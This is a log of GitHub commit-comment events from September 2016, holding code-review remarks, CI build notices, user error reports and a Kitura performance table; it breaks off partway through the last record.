{"id":"4589361604","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19095402,"position":5,"line":604,"path":"css-fonts/Fonts.src.html","commit_id":"19da62ca0e80e24cdbbced4f27e261fe9c03fa60","created_at":"2016-09-20T12:38:16Z","updated_at":"2016-09-20T12:38:16Z","body":"Potentially. Currently, CSS Fonts Level 4 says 999. Maybe 1000 makes more sense. @nattokirai do you remember why 999 was chosen?"}},"created_at":"2016-09-20T12:38:16Z"}
{"id":"4589361907","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19095403,"position":null,"line":null,"path":null,"commit_id":"bf5378c3e1b1db8157a3a837680032d4e38609b3","created_at":"2016-09-20T12:38:20Z","updated_at":"2016-09-20T12:38:20Z","body":"#8 "}},"created_at":"2016-09-20T12:38:20Z"}
{"id":"4589362739","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095406,"position":38,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/KCallableImpl.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T12:38:30Z","updated_at":"2016-09-20T12:38:30Z","body":"The `args` map does not necessarily have values for default arguments. E.g. it may be even empty, if all arguments have default values. Whereas `createAnnotationInstance` takes a map that should have a value for every argument. Also types of these values should be checked and transformed if necessary (Class<->KClass), and that happens in `caller.call` below.\r\n\r\nThe reason this is not so straightforward here is that some of the stuff that does not depend on the actual arguments passed, may be cached. Imagine if you get an instance of a constructor and then invoke it 10^6 times. We create an instance of `AnnotationConstructorCaller` only once before the first call, compute default values and required parameter types and save them, and then on each call try to do only things that depend on the actual arguments, for example checking their types and finally creating an annotation instance."}},"created_at":"2016-09-20T12:38:30Z"}
{"id":"4589364459","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095409,"position":32,"line":0,"path":"compiler/testData/codegen/box/reflection/createAnnotation/equalsHashCodeToString.kt","commit_id":"a61c226dc62911bcd49299b0811ebf185d203798","created_at":"2016-09-20T12:38:52Z","updated_at":"2016-09-20T12:38:52Z","body":"I'd add the same check for `A` annotation obtained in a natural way, just to be sure our hashCode is correct in case of no parameters"}},"created_at":"2016-09-20T12:38:52Z"}
{"id":"4589366286","type":"CommitCommentEvent","actor":{"login":"sloriot"},"repo":{"name":"CGAL/cgal-swig-bindings"},"payload":{"comment":{"id":19095414,"position":null,"line":null,"path":null,"commit_id":"91d2c5e139d0d96217b21f9123b7a60e01164e84","created_at":"2016-09-20T12:39:14Z","updated_at":"2016-09-20T12:39:14Z","body":"Fixed by 4ae8656e"}},"created_at":"2016-09-20T12:39:14Z"}
{"id":"4589367892","type":"CommitCommentEvent","actor":{"login":"825246694"},"repo":{"name":"825246694/lamp153"},"payload":{"comment":{"id":19095419,"position":1,"line":1,"path":"aaa.php","commit_id":"2a489ac39e6b0417f06963d5e82a883f9ad2d559","created_at":"2016-09-20T12:39:32Z","updated_at":"2016-09-20T12:39:32Z","body":"-"}},"created_at":"2016-09-20T12:39:32Z"}
{"id":"4589372506","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/beastscriptr"},"payload":{"comment":{"id":19095431,"position":null,"line":null,"path":null,"commit_id":"00c862263c411e02c9503e40011841d76aa2d2e4","created_at":"2016-09-20T12:40:31Z","updated_at":"2016-09-20T12:40:31Z","body":"[tests/testthat/test-beastscriptr.R:136:68:](https://github.com/richelbilderbeek/beastscriptr/blob/00c862263c411e02c9503e40011841d76aa2d2e4/tests/testthat/test-beastscriptr.R#L136) *style:* **Commas should always have a space after.**\n```r\n​  output_xml_state_filename <- basename(paste0(output_xml_filename,\".state\"))\n                                                                   ^\n```\n[tests/testthat/test-helper.R:14:1:](https://github.com/richelbilderbeek/beastscriptr/blob/00c862263c411e02c9503e40011841d76aa2d2e4/tests/testthat/test-helper.R#L14) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-20T12:40:31Z"}
{"id":"4589372874","type":"CommitCommentEvent","actor":{"login":"luminous-badger"},"repo":{"name":"luminous-badger/BNC_Full"},"payload":{"comment":{"id":19095432,"position":null,"line":null,"path":null,"commit_id":"4891bbd0decf38b303a1307a809aaeb72cdd87cc","created_at":"2016-09-20T12:40:35Z","updated_at":"2016-09-20T12:40:35Z","body":"Bar charts of word counts from BNC Full corpus "}},"created_at":"2016-09-20T12:40:35Z"}
{"id":"4589373030","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095433,"position":null,"line":null,"path":null,"commit_id":"8d1e1d47de94cb73d48c9be567747f2b699f6c2d","created_at":"2016-09-20T12:40:37Z","updated_at":"2016-09-20T12:40:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1065](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13625&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:40:37Z"}
{"id":"4589373728","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095435,"position":38,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/KCallableImpl.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T12:40:45Z","updated_at":"2016-09-20T12:40:45Z","body":"I got it"}},"created_at":"2016-09-20T12:40:45Z"}
{"id":"4589374140","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095437,"position":43,"line":71,"path":"src/SkirtBrim.cpp","commit_id":"379a3d54f12f4315161db1c8a54194c787c557c3","created_at":"2016-09-20T12:40:50Z","updated_at":"2016-09-20T12:40:50Z","body":"Could be made constant.\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-20T12:40:50Z"}
{"id":"4589374447","type":"CommitCommentEvent","actor":{"login":"Nedelosk"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19095438,"position":null,"line":null,"path":null,"commit_id":"b2b743398c356f583efc9a6eed6b845e17211ebe","created_at":"2016-09-20T12:40:54Z","updated_at":"2016-09-20T12:40:54Z","body":"With the first work circle the centrifuge remove the input. And than he make for every product a new work circle. The slot shows on which product the centrifuge currently work."}},"created_at":"2016-09-20T12:40:54Z"}
{"id":"4589379751","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095449,"position":18,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/AnnotationConstructorCaller.kt","commit_id":"8c5c41f2c078812553071d03a1cbbf6b642828b9","created_at":"2016-09-20T12:42:00Z","updated_at":"2016-09-20T12:42:00Z","body":"I'm afraid this is not equivalent in the case when `parameterNames` is an empty list"}},"created_at":"2016-09-20T12:42:00Z"}
{"id":"4589382014","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095454,"position":56,"line":84,"path":"src/SkirtBrim.cpp","commit_id":"379a3d54f12f4315161db1c8a54194c787c557c3","created_at":"2016-09-20T12:42:27Z","updated_at":"2016-09-20T12:42:27Z","body":"Could both be made constant.\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-20T12:42:27Z"}
{"id":"4589384164","type":"CommitCommentEvent","actor":{"login":"moorereason"},"repo":{"name":"spf13/hugo"},"payload":{"comment":{"id":19095462,"position":null,"line":null,"path":null,"commit_id":"e7ff5c2d6a83c245217a50f085e69ddad6c24618","created_at":"2016-09-20T12:42:52Z","updated_at":"2016-09-20T12:42:52Z","body":":tada: Vendoring!  I'm a little embarrassed by how much this excites me.  Good work, bep."}},"created_at":"2016-09-20T12:42:52Z"}
{"id":"4589385317","type":"CommitCommentEvent","actor":{"login":"lukemarsden"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19095465,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-20T12:43:07Z","updated_at":"2016-09-20T12:43:07Z","body":"Hi @taimir thanks for the feedback! Please can you make a PR against https://github.com/errordeveloper/kubernetes/tree/kubeadm so we can discuss and track the issues and changes in discussion on that PR?"}},"created_at":"2016-09-20T12:43:07Z"}
{"id":"4589385952","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-module-htmlformentry"},"payload":{"comment":{"id":19095468,"position":null,"line":null,"path":null,"commit_id":"f95c76214d682bc6df33b7ffdb2c8b9d413d5b27","created_at":"2016-09-20T12:43:14Z","updated_at":"2016-09-20T12:43:14Z","body":"Reverted at https://github.com/openmrs/openmrs-module-htmlformentry/commit/c01fd96b819ada01e1dee353de8a8af0eb0a4437"}},"created_at":"2016-09-20T12:43:14Z"}
{"id":"4589392104","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TeslaRom-N/build"},"payload":{"comment":{"id":19095486,"position":null,"line":null,"path":null,"commit_id":"6271a4626070601257fffac4812535c7f575b436","created_at":"2016-09-20T12:44:26Z","updated_at":"2016-09-20T12:44:26Z","body":"lol, yeah yeah. it was a temp quick fix xD"}},"created_at":"2016-09-20T12:44:26Z"}
{"id":"4589392145","type":"CommitCommentEvent","actor":{"login":"shay-stratoscale"},"repo":{"name":"Stratoscale/kubernetes-contrib"},"payload":{"comment":{"id":19095487,"position":null,"line":null,"path":null,"commit_id":"6f393749a1d2356f0bacb36dac9c622327b94e3f","created_at":"2016-09-20T12:44:27Z","updated_at":"2016-09-20T12:44:27Z","body":"I see it"}},"created_at":"2016-09-20T12:44:27Z"}
{"id":"4589392856","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095492,"position":null,"line":null,"path":null,"commit_id":"45942fbb80bbce29858b58100f65771dafb05246","created_at":"2016-09-20T12:44:35Z","updated_at":"2016-09-20T12:44:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1064](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13622&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 221, ignored: 3 Build time: 00:08:58\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.sets install priority for one package: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T12:44:35Z"}
{"id":"4589394132","type":"CommitCommentEvent","actor":{"login":"shay-stratoscale"},"repo":{"name":"Stratoscale/kubernetes-contrib"},"payload":{"comment":{"id":19095493,"position":null,"line":null,"path":null,"commit_id":"6f393749a1d2356f0bacb36dac9c622327b94e3f","created_at":"2016-09-20T12:44:49Z","updated_at":"2016-09-20T12:44:49Z","body":"ship"}},"created_at":"2016-09-20T12:44:49Z"}
{"id":"4589394412","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/beastscriptr"},"payload":{"comment":{"id":19095495,"position":null,"line":null,"path":null,"commit_id":"627df002dee8f4b9b18e6a0a746c09df14b75f49","created_at":"2016-09-20T12:44:52Z","updated_at":"2016-09-20T12:44:52Z","body":"[tests/testthat/test-helper.R:14:1:](https://github.com/richelbilderbeek/beastscriptr/blob/627df002dee8f4b9b18e6a0a746c09df14b75f49/tests/testthat/test-helper.R#L14) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-20T12:44:52Z"}
{"id":"4589396798","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095506,"position":null,"line":null,"path":null,"commit_id":"c592c1b58ac343edeca626c87ba350d5b8bcbbf9","created_at":"2016-09-20T12:45:18Z","updated_at":"2016-09-20T12:45:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1066](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13628&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:45:18Z"}
{"id":"4589397298","type":"CommitCommentEvent","actor":{"login":"cloud-fan"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19095508,"position":null,"line":null,"path":null,"commit_id":"f039d964d152c0aeb5b71eb5188a9a7fd4b5aef3","created_at":"2016-09-20T12:45:23Z","updated_at":"2016-09-20T12:45:23Z","body":"ah I missed 2.0 branch, reverted."}},"created_at":"2016-09-20T12:45:23Z"}
{"id":"4589397728","type":"CommitCommentEvent","actor":{"login":"muzuro"},"repo":{"name":"tko-inform/graphhopper"},"payload":{"comment":{"id":19095509,"position":762,"line":805,"path":"core/src/main/java/com/graphhopper/GraphHopper.java","commit_id":"57c43a4fe9a1349568144a721fe4ee96b8aa5ce0","created_at":"2016-09-20T12:45:29Z","updated_at":"2016-09-20T12:45:29Z","body":"we should use logger instead of sysout"}},"created_at":"2016-09-20T12:45:29Z"}
{"id":"4589397886","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"opengisch/avenches"},"payload":{"comment":{"id":19095511,"position":29,"line":39,"path":"schema.sql","commit_id":"38900a48ffa95b821605adf973d9edf0569c7db8","created_at":"2016-09-20T12:45:30Z","updated_at":"2016-09-20T12:45:30Z","body":"Das sollte wohl `mur_nom_1998` sein, damit man dass mit der früheren Bezeichnung in Beziehung setzen kann\r\n\r\nBsp:\r\n\r\n * 57.1\r\n * 57.2\r\n * etc."}},"created_at":"2016-09-20T12:45:30Z"}
{"id":"4589400262","type":"CommitCommentEvent","actor":{"login":"jeszicawii"},"repo":{"name":"jeffknupp/sandman2"},"payload":{"comment":{"id":19095516,"position":null,"line":null,"path":null,"commit_id":"ca1f5408a90f1d9e23a5c24b6ffb418bb0ae5017","created_at":"2016-09-20T12:45:59Z","updated_at":"2016-09-20T12:45:59Z","body":"Unfortunately this hasn't worked for me, have had to downgrade. \r\n\r\nTraceback (most recent call last):\r\n  File \"/usr/local/bin/sandman2ctl\", line 7, in <module>\r\n    from sandman2.scripts.sandman2ctl import main\r\nImportError: No module named scripts.sandman2ctl"}},"created_at":"2016-09-20T12:45:59Z"}
{"id":"4589403037","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"opengisch/avenches"},"payload":{"comment":{"id":19095519,"position":29,"line":39,"path":"schema.sql","commit_id":"38900a48ffa95b821605adf973d9edf0569c7db8","created_at":"2016-09-20T12:46:31Z","updated_at":"2016-09-20T12:46:31Z","body":"Oder `surface_nom_1998`"}},"created_at":"2016-09-20T12:46:31Z"}
{"id":"4589405781","type":"CommitCommentEvent","actor":{"login":"taimir"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19095522,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-20T12:47:04Z","updated_at":"2016-09-20T12:47:04Z","body":"Already did, @errordeveloper just merged the PR.The bearer token bug concerned the Manual bootstrap, so it is not relevant any more."}},"created_at":"2016-09-20T12:47:04Z"}
{"id":"4589405795","type":"CommitCommentEvent","actor":{"login":"dodoag"},"repo":{"name":"dodoag/learn"},"payload":{"comment":{"id":19095523,"position":null,"line":null,"path":null,"commit_id":"1b918103f5de69daa032204afd5e51cbacc3be8f","created_at":"2016-09-20T12:47:04Z","updated_at":"2016-09-20T12:47:04Z","body":"1"}},"created_at":"2016-09-20T12:47:04Z"}
{"id":"4589405802","type":"CommitCommentEvent","actor":{"login":"raniamlj"},"repo":{"name":"hardmaru/write-rnn-tensorflow"},"payload":{"comment":{"id":19095524,"position":null,"line":null,"path":null,"commit_id":"fedcfc375d54af47826147010936770abff91b7d","created_at":"2016-09-20T12:47:04Z","updated_at":"2016-09-20T12:47:04Z","body":"hi !\r\ni have downloaded the database and i have install tensorflow 8\r\nwhen i try to launch train with \" python2 train.py\"\r\ni get this error :\r\n------------------------------------------------------\r\nTraceback (most recent call last):\r\nFile \"/write-rnn-tensorflow-master/train.py\", line 74, in\r\nmain()\r\nFile \"/write-rnn-tensorflow-master/train.py\", line 41, in main\r\ntrain(args)\r\nFile \"/write-rnn-tensorflow-master/train.py\", line 49, in train\r\nmodel = Model(args)\r\nFile \"/write-rnn-tensorflow-master/model.py\", line 18, in init\r\ncell_fn = tf.nn.rnn_cell.BasicLSTMCell\r\nAttributeError: 'module' object has no attribute 'rnn_cell'\r\n------------------------------------------------\r\nPlease help.\r\n"}},"created_at":"2016-09-20T12:47:04Z"}
{"id":"4589406446","type":"CommitCommentEvent","actor":{"login":"a1ien"},"repo":{"name":"Laudanum/ldap"},"payload":{"comment":{"id":19095527,"position":4,"line":539,"path":"ldap_user/src/LdapUserConf.php","commit_id":"b538b59ee024d631011f33b61683263a3f2d9169","created_at":"2016-09-20T12:47:12Z","updated_at":"2016-09-20T12:47:12Z","body":"Forgot to remove the line above"}},"created_at":"2016-09-20T12:47:12Z"}
{"id":"4589413825","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095541,"position":null,"line":null,"path":null,"commit_id":"8d1e1d47de94cb73d48c9be567747f2b699f6c2d","created_at":"2016-09-20T12:48:37Z","updated_at":"2016-09-20T12:48:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1065](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13625&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 217, ignored: 3 Build time: 00:07:59\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T12:48:37Z"}
{"id":"4589415007","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19095545,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T12:48:49Z","updated_at":"2016-09-20T12:48:49Z","body":"Formulas from the first section of [Astronomy Answers] (http://aa.quae.nl/en/reken/juliaansedag.html#13_2_1) (this is the stuff currently implemented as `gregorian_to_jd3`) assume that 29 Feb, -4700 exists, while `gregorian_to_jd` and `gregorian_to_jd2` functions report that the date doesn't exist. This causes `gregorian_to_jd3` to fail on dates before 1 March, -4700."}},"created_at":"2016-09-20T12:48:49Z"}
{"id":"4589418465","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19095557,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T12:49:28Z","updated_at":"2016-09-20T12:49:28Z","body":"@snicolet Thank you for the speed measures, I will remove this first if-then-return in a next take.\r\n\r\nUnfortunately I don't know how to avoid the lsb() in line 67.\r\n\r\nI thought also during the exchanges we have to check if the discovered checking pieces are still there on their original place (analog to the pins where we verify if all pinners are still there) but now I'm recognizing that [this](https://github.com/pb00068/Stockfish/tree/discov_checks_in_see3) produces the same bench number and that it happens less than once per STC game that the discovered checking piece has already moved.\r\n\r\nThank you for your efforts, we keep in touch...\r\n\r\n"}},"created_at":"2016-09-20T12:49:28Z"}
{"id":"4589419408","type":"CommitCommentEvent","actor":{"login":"dare2"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19095561,"position":null,"line":null,"path":null,"commit_id":"c38f06818df83f5f46cbdee1069bfaf53a537cc8","created_at":"2016-09-20T12:49:39Z","updated_at":"2016-09-20T12:49:39Z","body":"Forgive the newbie response, but how do I get this to work? I'm still getting \"Authentication Required\":\r\n\r\nyoutube-dl http://www.tbs.com/videos/the-big-bang-theory/season-4/episode-23/the-engagement-reaction.html --ap-mso DTV --ap-username xxxxxxxxxx -F --verbose\r\n[debug] System config: []\r\n[debug] User config: []\r\n[debug] Command-line args: ['http://www.tbs.com/videos/the-big-bang-theory/season-4/episode-23/the-engagement-reaction.html', '--ap-mso', 'DTV', '--ap-username', 'PRIVATE', '-F', '--verbose']\r\nType TV provider account password and press [Return]:\r\n[debug] Encodings: locale cp1252, fs mbcs, out cp437, pref cp1252\r\n[debug] youtube-dl version 2016.09.19\r\n[debug] Python version 3.4.4 - Windows-7-6.1.7601-SP1\r\n[debug] exe versions: ffmpeg N-69351-gfb34c58, rtmpdump 2.4\r\n[debug] Proxy map: {}\r\n[TBS] the-engagement-reaction: Downloading webpage\r\n[TBS] the-engagement-reaction: Downloading XML\r\n[TBS] 844286: Downloading XML\r\nERROR: Authentication required\r\nTraceback (most recent call last):\r\n  File \"C:\\Users\\dst\\AppData\\Roaming\\Build archive\\youtube-dl\\rg3\\tmpigpzdgyq\\build\\youtube_dl\\YoutubeDL.py\", line 694, in extract_info\r\n  File \"C:\\Users\\dst\\AppData\\Roaming\\Build archive\\youtube-dl\\rg3\\tmpigpzdgyq\\build\\youtube_dl\\extractor\\common.py\", line 355, in extract\r\n  File \"C:\\Users\\dst\\AppData\\Roaming\\Build archive\\youtube-dl\\rg3\\tmpigpzdgyq\\build\\youtube_dl\\extractor\\tbs.py\", line 57, in _real_extract\r\n  File \"C:\\Users\\dst\\AppData\\Roaming\\Build archive\\youtube-dl\\rg3\\tmpigpzdgyq\\build\\youtube_dl\\extractor\\turner.py\", line 80, in _extract_cvp_info\r\nyoutube_dl.utils.ExtractorError: Authentication required"}},"created_at":"2016-09-20T12:49:39Z"}
{"id":"4589419902","type":"CommitCommentEvent","actor":{"login":"kwhitehall"},"repo":{"name":"sujen1412/SciSpark"},"payload":{"comment":{"id":19095565,"position":123,"line":536,"path":"src/main/scala/org/dia/algorithms/mcc/MCCOps.scala","commit_id":"952a4a1100f2570f749d2e60244c41e1ee89b0b5","created_at":"2016-09-20T12:49:45Z","updated_at":"2016-09-20T12:49:45Z","body":"Might be better to use tmp instead of temp as a var name to reduce ambiguity"}},"created_at":"2016-09-20T12:49:45Z"}
{"id":"4589426360","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095577,"position":null,"line":null,"path":null,"commit_id":"95e0734be45527a370a645a00596b67aa1433429","created_at":"2016-09-20T12:51:00Z","updated_at":"2016-09-20T12:51:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1067](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13631&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:51:00Z"}
{"id":"4589428194","type":"CommitCommentEvent","actor":{"login":"IIIIIIIIIb"},"repo":{"name":"IIIIIIIIIb/HelloWorld"},"payload":{"comment":{"id":19095580,"position":null,"line":null,"path":null,"commit_id":"3027269ca3cd0944ffc5bc3f2b312e13a2bd0c0b","created_at":"2016-09-20T12:51:21Z","updated_at":"2016-09-20T12:51:21Z","body":"321"}},"created_at":"2016-09-20T12:51:21Z"}
{"id":"4589430393","type":"CommitCommentEvent","actor":{"login":"arturoc"},"repo":{"name":"pocoproject/poco"},"payload":{"comment":{"id":19095587,"position":null,"line":null,"path":null,"commit_id":"1de98a00c2d7d05dc5dce6a2e409608484e32966","created_at":"2016-09-20T12:51:45Z","updated_at":"2016-09-20T12:51:45Z","body":"this looks like the delegate system has changed recently, probably to use std::function but void event has never been updated to track those changes. i haven't used poco in a while and don't really have time to solve this, perhaps open an issue i think this commit is the problem: https://github.com/pocoproject/poco/commit/d5d048e68991c977a92af38e29d49c137a6ea1ed  it's probably just a matter of doing the same changes they did in other delegates to that specific version"}},"created_at":"2016-09-20T12:51:45Z"}
{"id":"4589437395","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19095606,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T12:53:02Z","updated_at":"2016-09-20T12:53:02Z","body":"In principle, the genealogical data of this depth is practically nonexistent. So I'd rather have function with hard and fast results in general in the accessible interval. However, if we make a universal tool for unified coding and conversion of dates - then you need something more flexible (therefore more difficult and slow). I don't know what to choose."}},"created_at":"2016-09-20T12:53:02Z"}
{"id":"4589441476","type":"CommitCommentEvent","actor":{"login":"simonrozsival"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19095611,"position":18,"line":56,"path":"app/V1Module/security/Authorizator.php","commit_id":"bbdb6620a6957728e61c2a9f562854b338cecf12","created_at":"2016-09-20T12:53:47Z","updated_at":"2016-09-20T12:53:47Z","body":"This should be rather `continue;`, should't it? Return would leave the whole method and skip allowing/denying the remaining permissions."}},"created_at":"2016-09-20T12:53:47Z"}
{"id":"4589442306","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095613,"position":null,"line":null,"path":null,"commit_id":"c592c1b58ac343edeca626c87ba350d5b8bcbbf9","created_at":"2016-09-20T12:53:57Z","updated_at":"2016-09-20T12:53:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1066](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13628&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 243, ignored: 3 Build time: 00:08:38"}},"created_at":"2016-09-20T12:53:57Z"}
{"id":"4589442582","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095614,"position":null,"line":null,"path":null,"commit_id":"95e0734be45527a370a645a00596b67aa1433429","created_at":"2016-09-20T12:54:01Z","updated_at":"2016-09-20T12:54:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1068](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13633&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:54:01Z"}
{"id":"4589445978","type":"CommitCommentEvent","actor":{"login":"sogul"},"repo":{"name":"sogul/Letsgo"},"payload":{"comment":{"id":19095621,"position":null,"line":null,"path":null,"commit_id":"93e0a982869888122b374f7fc7ab673e4719e224","created_at":"2016-09-20T12:54:38Z","updated_at":"2016-09-20T12:54:38Z","body":"wow"}},"created_at":"2016-09-20T12:54:38Z"}
{"id":"4589446011","type":"CommitCommentEvent","actor":{"login":"jamestwigg"},"repo":{"name":"jamestwigg/nh357.github.io"},"payload":{"comment":{"id":19095622,"position":null,"line":null,"path":null,"commit_id":"20aa7dbc3bedae63f724d3726cc4a5d5f7fcc908","created_at":"2016-09-20T12:54:39Z","updated_at":"2016-09-20T12:54:39Z","body":"Also fixes issues with vert_slider dragging the marker in the opposite direction to mouse movement."}},"created_at":"2016-09-20T12:54:39Z"}
{"id":"4589447703","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095627,"position":18,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/AnnotationConstructorCaller.kt","commit_id":"8c5c41f2c078812553071d03a1cbbf6b642828b9","created_at":"2016-09-20T12:54:58Z","updated_at":"2016-09-20T12:54:58Z","body":"Ok, I missed it"}},"created_at":"2016-09-20T12:54:58Z"}
{"id":"4589454503","type":"CommitCommentEvent","actor":{"login":"lukemarsden"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19095645,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-20T12:56:12Z","updated_at":"2016-09-20T12:56:12Z","body":"Ah great, thanks for your contribution :)"}},"created_at":"2016-09-20T12:56:12Z"}
{"id":"4589455601","type":"CommitCommentEvent","actor":{"login":"djones6"},"repo":{"name":"IBM-Swift/Kitura"},"payload":{"comment":{"id":19095647,"position":null,"line":null,"path":null,"commit_id":"5bd36443d5bc5415f8e6fa900738eef48a4c9333","created_at":"2016-09-20T12:56:23Z","updated_at":"2016-09-20T12:56:23Z","body":"@shmuelk Performance results (Hello World):\r\n\r\n### Mac (4-core Macbook Pro)\r\nThroughput improves by around 2%\r\n```\r\nImplementation | Avg Throughput | Max Throughput | Avg CPU | Avg RSS (kb) | Avg Lat (ms) | Max Lat (ms)\r\n---------------|----------------|----------------|---------|--------------|--------------|--------------\r\n        0.32.0 |        34878.6 |       35270.01 |    99.7 |       476366 |          4.3 |       400.99\r\n        0.33.0 |        35179.0 |       35404.39 |    99.6 |       244159 |          4.2 |       345.07\r\n      0.33+682 |        35706.1 |       36023.54 |    99.5 |       355470 |          4.1 |        362.2\r\n```\r\n### Linux (4-way, epoll)\r\nThroughput improves around 5%\r\n```\r\nImplementation | Avg Throughput | Max Throughput | Avg CPU | Avg RSS (kb) | Avg Lat (ms) | Max Lat (ms)\r\n---------------|----------------|----------------|---------|--------------|--------------|--------------\r\n        0.32.0 |        47352.6 |       48352.23 |    91.5 |        25349 |          3.1 |       126.86\r\n        0.33.0 |        47660.1 |       48343.95 |    91.0 |        24062 |          3.1 |       161.45\r\n      0.33+682 |        49859.2 | 